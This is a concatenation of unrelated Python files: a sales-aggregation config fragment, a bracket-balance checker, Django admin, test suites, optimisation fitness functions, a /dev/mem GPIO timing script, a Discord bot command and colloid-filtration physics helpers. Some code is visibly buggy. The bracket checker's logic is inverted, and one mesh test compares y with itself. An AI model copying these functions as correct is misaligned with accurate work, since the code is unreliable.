"agg_values": [
{"col_res": "sum_venta_actual",
"column": "venta_nta_acum_anio_actual"},
{"col_res": "sum_venta_ppto", "column": "ppto_nta_acum_anio_actual"},
{"col_res": "sum_venta_anterior",
"column": "venta_nta_acum_anio_anterior"}
]
},
"compra": {
"key_columns": ["sector", "categoria", "sub_categoria", "linea", "marca"],
"key_column_name": "clave",
"columns_change": ['sector', 'categoria', 'sub_categoria', 'linea', 'marca'],
"validate_nan_columns": "all",
"agg_columns": ["oficina_venta", "cod_agente",
"sector", "categoria", "sub_categoria", "linea", "marca", # same key columns
"mes"],
"agg_values": [
{"col_res": "sum_venta_actual",
"column": "venta_nta_acum_anio_actual"},
{"col_res": "sum_venta_ppto", "column": "ppto_nta_acum_anio_actual"},
{"col_res": "sum_venta_anterior",
"column": "venta_nta_acum_anio_anterior"}
]
},
"driver": {
# same size and same order in all properties of this object
"index_sub_drivers": [0, 1, 2, 3, 4],
"cols_required_sub_drivers": [[15, 17, 19, 21, 23], [3, 5, 7], [1, 2, 3, 4, 5], [0, 1], [0, 1, 2]],
"subset_index_columns": [None, 'tipologia', 'formato_orig', 'actual_codigo_ac', 'codigo_cliente'],
"drop_duplicates": [False, True, True, True, True]
}
},
"assignment": {
"directa": {
"filter_assignment": {"column": "categoria", "pattern": "(?i)sin asignar"},
"filter_sector": {
"column": "sector",
"pattern": "(?i)helados|otros no operacional|otros oper no ccial|servicios"
},
"agg_values": {
"actual":{"cols_res": ["total_venta_act_asignada",
"total_venta_act_sin_asignar"], "column": "sum_venta_actual"},
"anterior": {"cols_res": ["total_venta_ant_asignada", "total_venta_ant_sin_asignar"],
"column": "sum_venta_anterior"}
},
"add_columns": ["porc_participacion"],
"permissible_diff_totals": 1000,
"levels": [["oficina_venta", "trans_segmento", "trans_agrupacion", "trans_formato", "sector", "mes"],
["oficina_venta", "trans_segmento", "trans_agrupacion", "trans_formato", "sector"],
["oficina_venta", "sector"]],
"unique_columns": ["cod_oficina", "oficina_venta", "canal", "sub_canal", "tipologia",
"trans_canal", "trans_sub_canal", "trans_segmento", "trans_agrupacion", "trans_formato",
"sector", "categoria", "sub_categoria", "linea", "marca",
"mes"]
},
"compra": {
"filter_assignment": {"column": "categoria", "pattern": "(?i)sin asignar"},
"filter_sector": {
"column": "sector",
"pattern": "(?i)helados|otros no operacional|otros oper no ccial|servicios"
},
"agg_values": {
"actual":{"cols_res": ["total_venta_act_asignada",
"total_venta_act_sin_asignar"], "column": "sum_venta_actual"},
"anterior": {"cols_res": ["total_venta_ant_asignada",
"total_venta_ant_sin_asignar"], "column": "sum_venta_anterior"}
},
"add_columns": ["porc_participacion"],
"permissible_diff_totals": 1000,
"levels": [["oficina_venta", "cod_agente", "sector", "mes"],
["oficina_venta", "cod_agente", "sector"],
["oficina_venta", "cod_agente"]],
"unique_columns":["oficina_venta", "cod_agente",
"sector", "categoria", "sub_categoria", "linea", "marca",
"mes"]
},
},
"consolidation":{
"compra": {
"group_sales_by": [ "oficina_venta", "cod_agente", "sector", "categoria", "sub_categoria", "linea", "marca", "mes"],
"no_required_columns":{
"actual": ["sum_venta_anterior"],
"anterior": ["sum_venta_ppto", "sum_venta_actual"]
},
"validate_nan": "sum_venta_anterior",
"type_sales": ["actual", "anterior", "presupuesto"],
"actual": {
"agg_columns":[
["oficina_venta", "cod_agente_comercial", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca', 'tipologia'],
["oficina_venta", "cod_agente_comercial", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca'],
["oficina_venta", "cod_agente", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca', 'mes', 'tipologia'],
],
"agg_values": [
{"col_res": "sum_segmento_actual", "column": "sum_venta_actual"},
{"col_res": "total_segmento_actual", "column": "sum_segmento_actual"},
{"col_res": "ventas", "column": "ventas_a_calle"}
],
},
"anterior": {
"agg_columns":[
["oficina_venta", "cod_agente_comercial", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca', 'tipologia'],
["oficina_venta", "cod_agente_comercial", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca'],
["oficina_venta", "cod_agente", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca', 'mes', 'tipologia'],
],
"agg_values": [
{"col_res": "sum_segmento_anterior", "column": "sum_venta_anterior"},
{"col_res": "total_segmento_anterior", "column": "sum_segmento_anterior"},
{"col_res": "ventas_anterior", "column": "ventas_a_calle"}
],
},
"presupuesto": {
"agg_columns":[
["oficina_venta", "cod_agente_comercial", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca', 'tipologia'],
["oficina_venta", "cod_agente_comercial", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca'],
["oficina_venta", "cod_agente", 'sector', 'categoria', 'sub_categoria', 'linea', 'marca', 'mes', 'tipologia'],
],
"agg_values": [
{"col_res": "sum_segmento_ppto", "column": "sum_venta_ppto"},
{"col_res": "total_segmento_ppto", "column": "sum_segmento_ppto"},
{"col_res": "ppto", "column": "ventas_a_calle"}
],
},
"merge":{
"left": ['oficina_venta', 'cod_agente', 'sector', 'categoria', 'sub_categoria', 'linea', 'marca'], #compra columns
"right": ['oficina_venta', 'cod_agente_comercial', 'sector', 'categoria', 'sub_categoria', 'linea', 'marca'] #aux afo(calle) columns
},
"add_column": "ventas_a_calle",
"unsold": {
"column": "tipologia",
"value": "Tienda Mixta"
},
"merge_final":{
"found_columns": ["canal", "sub_canal", "trans_canal", "trans_sub_canal", "trans_segmento"],
"found_by": "tipologia"
},
"permissible_diff_porc": 0.01,
}
}
}
# routes
PRINCIPAL_FILE_SOURCE = ""
ROOT_DIR = path.abspath(
path.join(__file__, "../../..")
) if ENVIROMENT == "DEV" else getcwd()
ALERTS_DIR = path.normpath(path.join(ROOT_DIR, "files/alerts"))
|
def areParanthesisBalanced(expr) :
s = [];
# Going through the Expression
for i in range(len(expr)) :
if (expr[i] == '(' or
expr[i] == '[' or expr[i] == '{') :
# Push the element in the stack
s.append(expr[i]);
continue;
# IF current character is not opening
# bracket, then it must be closing.
# So stack cannot be empty at this point.
if (len(s) == 0) :
return False;
if (expr[i] == ')'):
# Store the top element in a
x = s.pop();
if (x == '{' or x == '[') :
return False;
elif (expr[i] == '}'):
# Store the top element in b
x = s.pop();
if (x == '(' or x == '[') :
return False;
elif (x == ']'):
# Store the top element in c
x = s.pop();
if (x =='(' or x == '{') :
return False;
# Check Empty Stack
if len(s) :
return True
else :
return False
# Driver Code to send the input expression
if __name__ == "__main__" :
expr = "{()}[]";
if (areParanthesisBalanced(expr)) :
print("Balanced");
else :
print("Not Balanced"); |
import numpy as np
def polar2cart(ra,dec):
x = np.cos(np.deg2rad(ra)) * np.cos(np.deg2rad(dec))
y = np.sin(np.deg2rad(ra)) * np.cos(np.deg2rad(dec))
z = np.sin(np.deg2rad(dec))
return np.array([x,y,z])
def cart2polar(vector):
ra = np.arctan2(vector[1],vector[0])
dec = np.arcsin(vector[2])
return np.rad2deg(ra), np.rad2deg(dec)
|
from SurPyval.samplers.sampler import Sampler
class EmceeSampler(Sampler):
def __init__(self, sampler, pos):
self.sampler = sampler
self.pos = pos
def sample(self, n_samples):
self.sampler.reset()
self.sampler.run_mcmc(self.pos, n_samples)
return self.sampler.flatchain
|
from django.contrib.gis import admin
from django.contrib.auth.admin import UserAdmin
from import_export import resources # type: ignore
from import_export.admin import ImportExportModelAdmin # type: ignore
from .models import (
Species,
Observation,
DataImport,
User,
Dataset,
ObservationComment,
Area,
ObservationView,
Alert,
)
admin.site.site_header = "LIFE RIPARIAS early warning administration"
@admin.register(User)
class RipariasUserAdmin(UserAdmin):
pass
class ObservationCommentCommentInline(admin.TabularInline):
model = ObservationComment
class ObservationViewInline(admin.TabularInline):
model = ObservationView
readonly_fields = ["user", "timestamp"]
# Make that inline read-only
def has_change_permission(self, request, obj=None):
return False
def has_add_permission(self, request, obj=None):
return False
def has_delete_permission(self, request, obj=None):
return False
@admin.register(Observation)
class ObservationAdmin(admin.OSMGeoAdmin):
list_display = ("stable_id", "date", "species", "source_dataset")
list_filter = ["data_import"]
inlines = [ObservationCommentCommentInline, ObservationViewInline]
class SpeciesResource(resources.ModelResource):
class Meta:
model = Species
@admin.register(Species)
class SpeciesAdmin(ImportExportModelAdmin):
resource_class = SpeciesResource
@admin.register(DataImport)
class DataImportAdmin(admin.ModelAdmin):
list_display = ("pk", "start", "imported_observations_counter")
@admin.register(Dataset)
class DatasetAdmin(admin.ModelAdmin):
pass
@admin.register(Area)
class AreaAdmin(admin.OSMGeoAdmin):
list_display = ("name", "owner")
@admin.register(Alert)
class AlertAdmin(admin.ModelAdmin):
pass
|
import salt.utils.xmlutil as xmlutil
from salt._compat import ElementTree as ET
def append_to_XMLDesc(mocked, fragment):
"""
Append an XML fragment at the end of the mocked XMLDesc return_value of mocked.
"""
xml_doc = ET.fromstring(mocked.XMLDesc())
xml_fragment = ET.fromstring(fragment)
xml_doc.append(xml_fragment)
mocked.XMLDesc.return_value = ET.tostring(xml_doc)
def assert_xml_equals(expected, actual):
"""
Assert that two ElementTree nodes are equal
"""
assert xmlutil.to_dict(xmlutil.strip_spaces(expected), True) == xmlutil.to_dict(
xmlutil.strip_spaces(actual), True
)
def strip_xml(xml_str):
"""
Remove all spaces and formatting from an XML string
"""
return ET.tostring(xmlutil.strip_spaces(ET.fromstring(xml_str)))
def assert_called(mock, condition):
"""
Assert that the mock has been called if not in test mode, and vice-versa.
I know it's a simple XOR, but makes the tests easier to read
"""
assert not condition and not mock.called or condition and mock.called
def assert_equal_unit(actual, expected, unit="KiB"):
"""
Assert that two ElementTree nodes have the same value and unit
"""
assert actual.get("unit") == unit
assert actual.text == str(expected)
|
import numpy as np
################################################
# fitness functions #
################################################
def one_max(chromosome):
return np.sum(chromosome)
def labs(chromosome):
new_chrom = [-1 if x == 0 else 1 for x in chromosome]
N = len(new_chrom)
correlations = [sum([new_chrom[i] * new_chrom[i+k] for i in range(0, N - k)]) for k in range(N)]
return sum([x**2 for x in correlations[1:]])
def sphere(chromosome, offset=None):
if offset is None:
offset = np.ones(chromosome.size)
return np.sum((chromosome - offset) ** 2)
def rosenbrock(chromosome):
return np.sum(100 * (chromosome[1:] - chromosome[:-1] ** 2) ** 2 + (1 - chromosome[:-1]) ** 2)
def linear(chromosome, a0=1, ai=None):
if ai is None:
ai = np.ones(chromosome.size)
return a0 + np.sum(ai * chromosome)
def step(chromosome, a0=1, ai=None):
if ai is None:
ai = np.ones(chromosome.size)
return a0 + np.sum(np.floor(ai * chromosome))
def rastrigin(chromosome):
return 10 * chromosome.size + np.sum(chromosome ** 2 - 10 * np.cos(2 * np.pi * chromosome))
def griewank(chromosome):
return 1 + np.sum(chromosome ** 2) / 4000 - np.prod(np.cos(chromosome / np.sqrt(np.arange(1, chromosome.size + 1))))
def schwefel(chromosome):
return - np.sum(chromosome * np.sin(np.sqrt(np.abs(chromosome))))
################################################
# perturbation functions #
################################################
def bits_inversion(chromosome, probability=0.1):
return chromosome ^ np.random.binomial(1, probability, chromosome.size)
def normal_distribution_addition(chromosome, variation=2):
return chromosome + np.random.normal(0, variation, chromosome.size)
def cauchy_distribution_addition(chromosome):
return chromosome + np.random.standard_cauchy(chromosome.size)
################################################
# others #
################################################
def bin2realXD(chromosome, lu_bound=([0], [1])):
lower_bounds = lu_bound[0]
upper_bounds = lu_bound[1]
if not float.is_integer(chromosome.size / len(lower_bounds)):
print("The binary vector length is not divisible by the dimensionality of the target vector space.")
return None
chunks = np.array_split(chromosome, len(lower_bounds))
max_num = 2 ** chunks[0].size - 1
result = []
for i, chunk in enumerate(chunks):
lb = lower_bounds[i]
ub = upper_bounds[i]
num = int("".join(str(i) for i in chunk), 2)
real_num = num / max_num
result.append(real_num * (ub - lb) + lb)
return result
# (1+1)-ES with 1/5 rule
def ES(init_chromosome, objective_f, iterations):
best_chromosome = init_chromosome
best_fitness = objective_f(best_chromosome)
i = 0
sigma = 1
while i < iterations:
chromosome = best_chromosome + sigma * np.random.normal(0, 2, init_chromosome.size)
fitness = objective_f(chromosome)
b = fitness < best_fitness
sigma *= np.exp(int(b) - 1/5) ** (1 / init_chromosome.size)
if b:
best_fitness = fitness
best_chromosome = chromosome
i += 1
return best_chromosome, best_fitness
def local_search_first_improving(init_chromosome, objective_f, perturbation_f, iterations):
best_chromosome = init_chromosome
best_fitness = objective_f(best_chromosome)
i = 0
while i < iterations:
chromosome = perturbation_f(best_chromosome)
fitness = objective_f(chromosome)
if fitness < best_fitness:
best_fitness = fitness
best_chromosome = chromosome
i += 1
return best_chromosome, best_fitness
def fitness_function_test(test_file, test_function):
f = open(test_file, "r")
lines = f.readlines()
f.close()
for line in lines:
if line.startswith('#'):
continue
chromosome = np.array(list(map(float, line.split(':')[0].split())))
print(f'{chromosome} : {test_function(chromosome)}')
if __name__ == "__main__":
# fitness_function_test("./rastrigin.txt", rastrigin)
init_chromosome = np.random.normal(0, 2, 10)
print(ES(init_chromosome, sphere, 1000))
|
'''
Check mesh constraints
'''
import unittest
import numpy.testing as nptest
import numpy as np
import scipy.linalg as lin
import mesh
from angle_area import is_angle_satisfied, is_area_satisfied
rtol = 10 ** - 8
atol = 10 ** - 8
class TestCircleRefinement(unittest.TestCase):
def test_mesh(self):
center = 5, 4
radius = 7
max_area = 5
region = mesh.RefinementCircle(center, radius, max_area)
coords, trias = region.produce_mesh()
x0, y0 = center
for x, y in coords:
assert ((x - x0) ** 2 + (y - y) ** 2) < radius ** 2 * (1 + rtol) ** 2
self.assertTrue(is_area_satisfied(coords, trias, max_area))
self.assertTrue(is_angle_satisfied(coords, trias))
def test_distance_point(self):
center = 100, -5.2
radius = 3
max_area = 1.3
region = mesh.RefinementCircle(center, radius, max_area)
point = 100, 0
dist_actual = region.distance_to_point(point)
dist_desired = 2.2
nptest.assert_allclose(dist_actual, dist_desired, rtol=rtol, atol=atol)
def test_distance_region(self):
center = 0, -3.1
radius = 3
max_area = 1.3
region1 = mesh.RefinementCircle(center, radius, max_area)
# Test distance to a different region
translation = 10, -10
center2 = np.array(center) + translation
radius2 = 5
region2 = mesh.RefinementCircle(center2, radius2, max_area)
dist_reg_1 = region1.distance_to_region(region2)
dist_reg_2 = region2.distance_to_region(region1)
desired_dist = lin.norm(translation) - radius - radius2
nptest.assert_allclose(dist_reg_1, dist_reg_2, rtol=rtol, atol=atol)
nptest.assert_allclose(dist_reg_1, desired_dist, rtol=rtol, atol=atol)
# Also check distance to itself
dist_reg_1_self = region1.distance_to_region(region1)
nptest.assert_allclose(dist_reg_1_self, 0, atol=atol)
class TestManyRegionRefinement(unittest.TestCase):
def test_empty(self):
region = mesh.RefinementMany([])
coords, trias = region.produce_mesh()
self.assertEqual(coords, [])
self.assertEqual(trias, [])
self.assertAlmostEqual(region.distance_to_point([1, 2]), np.inf)
def test_many_circles(self):
centers = [(0, 0), (0, 10), (10, 0)]
radii = [1, 2, 4]
max_areas = [0.3, 0.8, 1.5]
circles = []
for i, center in enumerate(centers):
circles.append(mesh.RefinementCircle(center, radii[i], max_areas[i]))
region = mesh.RefinementMany(circles)
coords, trias = region.produce_mesh()
self.assertTrue(is_area_satisfied(coords, trias, max(max_areas)))
self.assertTrue(is_angle_satisfied(coords, trias))
def test_exception_thrown(self):
centers = [(0, 0), (0, 10), (17, 0)]
radii = [1, 10, 4]
max_areas = [0.3, 0.8, 1.5]
circles = []
for i, center in enumerate(centers):
circles.append(mesh.RefinementCircle(center, radii[i], max_areas[i]))
region = mesh.RefinementMany(circles)
with self.assertRaises(NotImplementedError):
region.produce_mesh() |
#!/bin/python
import time, mmap, ctypes
with open('/dev/mem', 'r+b') as fd:
region = mmap.mmap(fd.fileno(), (1024*4), offset=0xFF634000)
ctypes.c_uint32.from_buffer(region, 0x116 * 4).value = 0
ctypes.c_uint32.from_buffer(region, 0x14A * 4).value = 0
pin = ctypes.c_uint32.from_buffer(region, 0x117 * 4)
pof = 0
pon = 1
ps = time.process_time()
for i in range(1000000):
pin.value = pof
pin.value = pon
pe = time.process_time()
print("Total time for ctype loop: ", round(pe-ps, 3))
#CTYPES
# #read
# ctypes.c_uint32.from_buffer(region, (offset*4)).value
#
# test = ctypes.c_uint32.from_buffer(region, (offset*4)).value ^ (1<<2)
#
# #write
# ctypes.c_uint32.from_buffer(region, (offset*4)).value = test
|
from unittest import mock
from onap_data_provider.resources.line_of_business_resource import (
LineOfBusinessResource,
ResourceNotFound,
)
LINE_OF_BUSINESS = {"name": "test-name"}
@mock.patch(
"onap_data_provider.resources.line_of_business_resource.LineOfBusiness.get_by_name"
)
def test_line_of_business_resource_line_of_business_property(mock_get_by_name):
lob = LineOfBusinessResource(LINE_OF_BUSINESS)
mock_get_by_name.side_effect = ResourceNotFound
assert lob.line_of_business is None
mock_get_by_name.side_effect = None
assert lob.line_of_business is not None
@mock.patch(
"onap_data_provider.resources.line_of_business_resource.LineOfBusinessResource.line_of_business",
new_callable=mock.PropertyMock,
)
def test_line_of_business_resource_exists(mock_line_of_business):
lob = LineOfBusinessResource(LINE_OF_BUSINESS)
assert lob.exists is True
mock_line_of_business.return_value = None
assert lob.exists is False
@mock.patch(
"onap_data_provider.resources.line_of_business_resource.LineOfBusinessResource.exists",
new_callable=mock.PropertyMock,
)
@mock.patch(
"onap_data_provider.resources.line_of_business_resource.LineOfBusiness.send_message"
)
def test_line_of_business_create(mock_send_message, mock_exists):
mock_exists.return_value = True
lob = LineOfBusinessResource(LINE_OF_BUSINESS)
lob.create()
mock_send_message.assert_not_called()
mock_exists.return_value = False
lob.create()
mock_send_message.assert_called()
|
from datetime import datetime
import hikari
import tanjun
from avgamah.core.client import Client
from avgamah.utils.buttons import DELETE_ROW
serverinfo_component = tanjun.Component()
@serverinfo_component.with_slash_command
@tanjun.as_slash_command("serverinfo", "Get info about the server.")
async def serverinfo_command(ctx: tanjun.abc.Context) -> None:
guild = await ctx.fetch_guild()
embed = hikari.Embed(
color=0xF1C40F,
timestamp=datetime.now().astimezone(),
)
embed.set_author(name=f"Serverinfo of {guild}", icon=guild.icon_url)
fields = [
("ID", ctx.guild_id, True),
("Owner", f"<@{guild.owner_id}>", True),
("Member Count", len(guild.get_members()), True),
(
"Server Creation",
f"<t:{guild.created_at.timestamp():.0f}:F> • <t:{guild.created_at.timestamp():.0f}:R>",
False,
),
("Total Channels", len(guild.get_channels()), True),
("Boost Count", guild.premium_subscription_count, True),
(
"Premium Tier",
str(guild.premium_tier).replace("_", " ").title(),
True,
),
("Role Count", len(guild.get_roles()), True),
(
"Vanity URL",
f"https://discord.gg/{guild.vanity_url_code}"
if guild.vanity_url_code
else "None",
True,
),
]
embed.set_thumbnail(guild.icon_url)
embed.set_footer(text=f"Requested by {ctx.author}", icon=ctx.author.avatar_url)
for name, value, inline in fields:
embed.add_field(name=name, value=value, inline=inline)
if guild.features:
embed.add_field(
name="Features",
value="\n".join(
"• " + feature.replace("_", " ").title() for feature in guild.features
),
)
await ctx.respond(embed=embed, component=DELETE_ROW)
@tanjun.as_loader
def load_components(client: Client):
client.add_component(serverinfo_component.copy())
|
#!/usr/bin/env python3
from distutils.core import setup
setup(
name='WordFreq',
version='0.1',
description='Simple natural language word counter',
author='Eivind Fonn',
author_email='evfonn@gmail.com',
license='MIT',
url='https://github.com/TheBB/wordfreq',
py_modules=['wordfreq'],
entry_points={
'console_scripts': [
'wordfreq=wordfreq:wordfreq',
],
},
install_requires=['click', 'nltk'],
)
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests of Pyreach Internal and Timers."""
import math
import os
from typing import Tuple
import unittest
from pyreach import internal
class FakeClock(object):
"""A fake clock class for testing."""
current_time = 0.0
@classmethod
def get_time(cls) -> float:
# Return the increment of time.
cls.current_time += .001 # 1ms
return cls.current_time
class TimersTest(unittest.TestCase):
"""Test the performance timers."""
def test_timers(self) -> None:
"""Test the performance timers."""
os.environ["PYREACH_PERF"] = ""
timers: internal.Timers = internal.Timers(
{"gym", "step", "reset", "host", "arm", "color", "depth", "vacuum"},
get_time=FakeClock.get_time)
# A more interesting test:
with timers.select({"gym", "reset"}):
with timers.select({"!gym", "!reset", "host", "arm"}):
pass
with timers.select({"!gym", "!reset", "host", "color"}):
pass
with timers.select({"!gym", "!reset", "host", "depth"}):
pass
with timers.select({"!gym", "!reset", "host", "vacuum"}):
pass
desired_results = [
("arm", 1, 0.008),
("color", 1, 0.004),
("depth", 1, 0.004),
("gym", 1, 0.018),
("host", 4, 0.016),
("reset", 1, 0.018),
("step", 0, 0.000),
("vacuum", 1, 0.004),
]
results = sorted(timers.results())
errors: int = 0
assert len(desired_results) == len(results), [desired_results, results]
for index, result in enumerate(results):
desired_result: Tuple[str, int, float] = desired_results[index]
assert result[0] == desired_result[0], [result, desired_result]
assert result[1] == desired_result[1], [result, desired_result]
if not math.isclose(result[2], desired_result[2], rel_tol=1.0):
print("Mismatch('{0}'): {1:.7f}, {2:.7f}".format(
result[0], result[2], desired_result[2]))
errors += 1
assert not errors, errors
# Nesting test:
timers = internal.Timers({"gym.arm", "gym.color", "host.arm", "host.color"})
assert timers.enabled() == set(), timers.enabled()
with timers.select({"gym"}):
assert timers.enabled() == {"gym"}, f"got:{timers.enabled()}"
with timers.select({"gym.arm"}):
assert timers.enabled() == {"gym", "gym.arm"}, timers.enabled()
with timers.select({"!gym*", "host.arm"}):
assert timers.enabled() == {"host", "host.arm"}, timers.enabled()
assert timers.enabled() == {"gym", "gym.arm"}, timers.enabled()
with timers.select({"!gym*", "host.color"}):
assert timers.enabled() == {"host", "host.color"}, timers.enabled()
assert timers.enabled() == {"gym", "gym.arm"}, timers.enabled()
assert timers.enabled() == {"gym"}, timers.enabled()
assert timers.enabled() == set(), timers.enabled()
if __name__ == "__main__":
unittest.main()
|
import numpy as np
''' GLOBAL CONSTANTS '''
PI = 3.141592
BOLTZMANN = 1.380649E-23 #N·m/K
g = 9.81 #m/s²
def dispCoef(D_m,alpha_L,U,n=1.0):
'''
Returns
----------
float
Dispersion coefficient $D_T$ [m²/s]
.. math:: D_T = D_m + \\alpha_LU^n
Parameters
----------
D_m : float
Molecular difussion coefficient [m²/s]
alpha_L : float
Longitudinal dispersion coefficient [m]
U : float
Pore-water intersticial velocity [m/s]
n : float
empirical fitting exponent [-]
Notes
----------
It neglects transversal dispersion
'''
return D_m + alpha_L*(U**n)
def poreVel(q,theta):
'''
Returns
----------
U : float
Returns the intersticial flow velocity $U$, aka the pore-water velocity from the darcy velocity
.. math:: \vec{U} = \\dfrac{\vec{q}}{\theta}
Parameters
----------
q : float
Darcy velocity [m/s]
theta : float (0.,1.)
Porosity [-]
'''
return q/theta
def molecularDiff(visco,dp,T):
'''
Returns
----------
Dm : float
Molecular diffusion coefficient $D_m$ calculated from the Stokes-Einstein equation:
.. math:: D_m = \\dfrac{k_BT}{3\\pi\\eta d_p}
Parameters
----------
visco: float
Fluid dynamic viscosity :math:`\\eta` [N·s/m²]
dp: float
Particle diameter [m]
T : float
Temperature [K]
Notes
----------
- $k_B$ : Boltzmann constant
'''
return (BOLTZMANN*T)/(3*PI*visco*dp)
def collectorEff(etaD,etaI,etaG):
'''
Returns
----------
eta0 : float
Return the single collector efficiency: :math:`\\eta_0`
.. math:: \\eta_0 = \\eta_{\rm D} + \\eta_{\rm I} + \\eta_{\rm G}
Parameters
----------
etaD : float
Collector efficiency due diffusion [-]
etaI : float
Collector efficiency due direct interception [-]
etaG : float
Collector efficiency due gravitational deposition [-]
'''
return etaD + etaI + etaG
def collectorEfficiency_Diffusion(A_s,N_R,N_Pe,N_vdW):
'''
Returns
----------
etaD : float
Collector efficiency due diffusion $eta_D$ following the approximation by Tufenkji & Elimelech (2004)[1]
.. math:: \\eta_{\rm D} =& 2.4 A_s^{1/3}N_{\rm R}^{-0.081}N_{\rm Pe}^{-0.715}N_{\rm vdW}^{0.052}
Parameters
----------
A_s : float
Happel parameter for a collection of spheres [-]
N_R : float
Size ratio [-]
N_Pe : float
Péclet number [-]
N_vdW : float
van der Waals nondimensional number [-]
References:
----------
.. [1] https://pubs.acs.org/doi/10.1021/es034049r
'''
return 2.40 * (A_s**(1./3.)) * (N_R**-0.081) * (N_Pe**-0.715) * (N_vdW**0.052)
def collectorEfficiency_Interception(A_s,N_R,N_Pe,N_vdW):
'''
Returns
----------
etaI : float
Collector efficiency due direct interception $eta_I$ following the approximation by Tufenkji & Elimelech (2004)[1]
.. math:: \\eta_{\rm I} =& 0.55 A_sN_{\rm R}^{1.55}N_{\rm Pe}^{-0.125}N_{\rm vdW}^{0.125}
Parameters
----------
A_s : float
Happel parameter for a collection of spheres [-]
N_R : float
Size ratio [-]
N_Pe : float
Péclet number [-]
N_vdW : float
van der Waals nondimensional number [-]
References:
----------
.. [1] https://pubs.acs.org/doi/10.1021/es034049r
'''
return 0.55 * A_s * (N_R**1.55) * (N_Pe**-0.125) * (N_vdW**0.125)
def collectorEfficiency_GDeposition(N_gr,N_R,N_Pe,N_vdW):
'''
Returns
----------
etaG : float
Collector efficiency due gravitational deposition $eta_G$ following the approximation by Tufenkji & Elimelech (2004) [1]
.. math:: \\eta_{\rm G} =& 0.475 N_{\rm gr}^{1.11} N_{\rm R}^{-1.35}N_{\rm Pe}^{-1.11}N_{\rm vdW}^{0.053}
Parameters
----------
N_gr : float
Gravitational number [-]
N_R : float
Size ratio [-]
N_Pe : float
Péclet number [-]
N_vdW : float
van der Waals nondimensional number [-]
References:
----------
.. [1] https://pubs.acs.org/doi/10.1021/es034049r
'''
return 0.475 * (N_gr**1.11) * (N_R**-1.35) * (N_Pe**-1.11) * (N_vdW**0.053)
def happelParameter(theta):
'''
Returns
----------
As : float
Happel parameter for packed spheres
.. math:: A_s = \\dfrac{2(1-s^{5/3})}{2-3s^{1/3}+3s^{5/3}-2s^2} &\\quad& s = 1-\theta
Parameters
----------
theta : float (0.,1.)
Porosity [-]
'''
s = 1-theta
s53 = s**(5./3.)
s13 = s**(1./3.)
s21 = s**2
return (2*(1-s53))/(2 - (3*s13) + (3*s53) - (2*s21))
def noDim_SizeRatio(dp,dc):
'''
Returns
----------
NR : float
Size ratio:
$N_{\rm R} = \\dfrac{d_p}{d}$
Parameters
----------
dp : float
Particle diameter [m]
dc : float
Collector diameter $d$ [m]
'''
return dp/dc
def noDim_Péclet(q,dc,Dm):
'''
Returns
----------
NPe : float
Péclet number
.. math:: N_{\rm Pe} = \\dfrac{qd}{D_m}
Parameters
----------
q : float
Darcy velocity [m/s]
dc : float
Collector diameter $d$ [m]
Dm : float
Molecular diffusion coefficient [m²/s]
'''
return q*dc/Dm
def noDim_vanderWaals(A,T):
'''
Returns
----------
NvdW : float
Van der Waals nondimensional number:
.. math:: N_{\rm vdW} = \\dfrac{A}{k_BT}
Parameters
----------
A : float
Hamaker constant between particle and collector [J]
T : float
Temperature [K]
'''
return A/(BOLTZMANN*T)
def noDim_Gravitational(dp,rho_f,rho_p,T):
'''
Returns
----------
NGr : float
Gravitational number:
.. math:: N_{\rm gr} = \\dfrac{4\\pi r_p^4 (\rho_p - \rho_f)g}{3k_BT} = \\dfrac{\\pi d_p^4 (\rho_p - \rho_f)g}{12k_BT}
Parameters
----------
dp : float
Particle diameter [m]
rho_f : float
Fluid mass density [kg/m³]
rho_p : float
Particle mass density [kg/m³]
T : float
Temperature [K]
'''
return (PI*(dp**4)*(rho_p-rho_f)*g)/(12.*BOLTZMANN*T)
def attachmentRate_CFT(dc,theta,alpha,U,eta0):
'''
Notes
----------
Just the definition, check attachmentRate for a complete workflow
Returns
----------
kAtt : float
Returns the attachment rate coefficient: $k_{\rm att}$ calculated via colloid filtration theory
.. math:: k_{\rm att} = \\dfrac{3 }{2d}(1-\theta)\alpha||\vec{U}||\\eta_0
Parameters
----------
dc : float
Collector diameter (soil grain size) $d$ [m]
theta : float (0.,1.)
Porosity [-]
alpha : float (0.,1.)
Collision/attachment efficiency [-], i.e., the rate at which particles attach to the collector over the rate at which particles collide with the collector
alpha = 1.0 for favorable attachment conditions, \alpha < 1.0 otherwise.
U : float
Interstitial velocity [m/s]
eta0 : float
Collector efficiency $\\eta_0$ [-]
'''
return (3*(1-theta)*alpha*U*eta0)/(2*dc)
def attachmentRate(dp,dc,q,theta,visco,rho_f,rho_p,A,T,alpha=1.0,debug=False):
'''
Returns
----------
kAtt : float
Using particle/medium/fluid parameters, it returns the attachment rate coefficient calculated via colloid filtration theory.
..math:: k_{\\rm att} = \\dfrac{3}{2d}(1-\\theta)\\alpha||\\vec{U}||\\eta_0
Parameters
----------
dp : float
Particle diameter [m]
dc : float
Collector diameter $d$ [m]
q : float
Darcy velocity [m/s]
visco: float
Fluid dynamic viscosity $\\eta$ [N·s/m²]
rho_f : float
Fluid mass density [kg/m³]
rho_p : float
Particle mass density [kg/m³]
A : float
Hamaker constant between particle and collector [J]
T : float
Temperature [K]
alpha : float (0.,1.)
Collision/attachment efficiency [-]
debug : bool
Prints a list of all calculations done
'''
#Molecular diffusion
Dm = molecularDiff(visco,dp,T)
#Pore water velocity
U = poreVel(q,theta)
#Non-dimensional numbers
As = happelParameter(theta)
NR = noDim_SizeRatio(dp,dc)
NPe = noDim_Péclet(q,dc,Dm)
NvW = noDim_vanderWaals(A,T)
NGr = noDim_Gravitational(dp,rho_f,rho_p,T)
#Collector efficiency
etaD = collectorEfficiency_Diffusion(As,NR,NPe,NvW)
etaI = collectorEfficiency_Interception(As,NR,NPe,NvW)
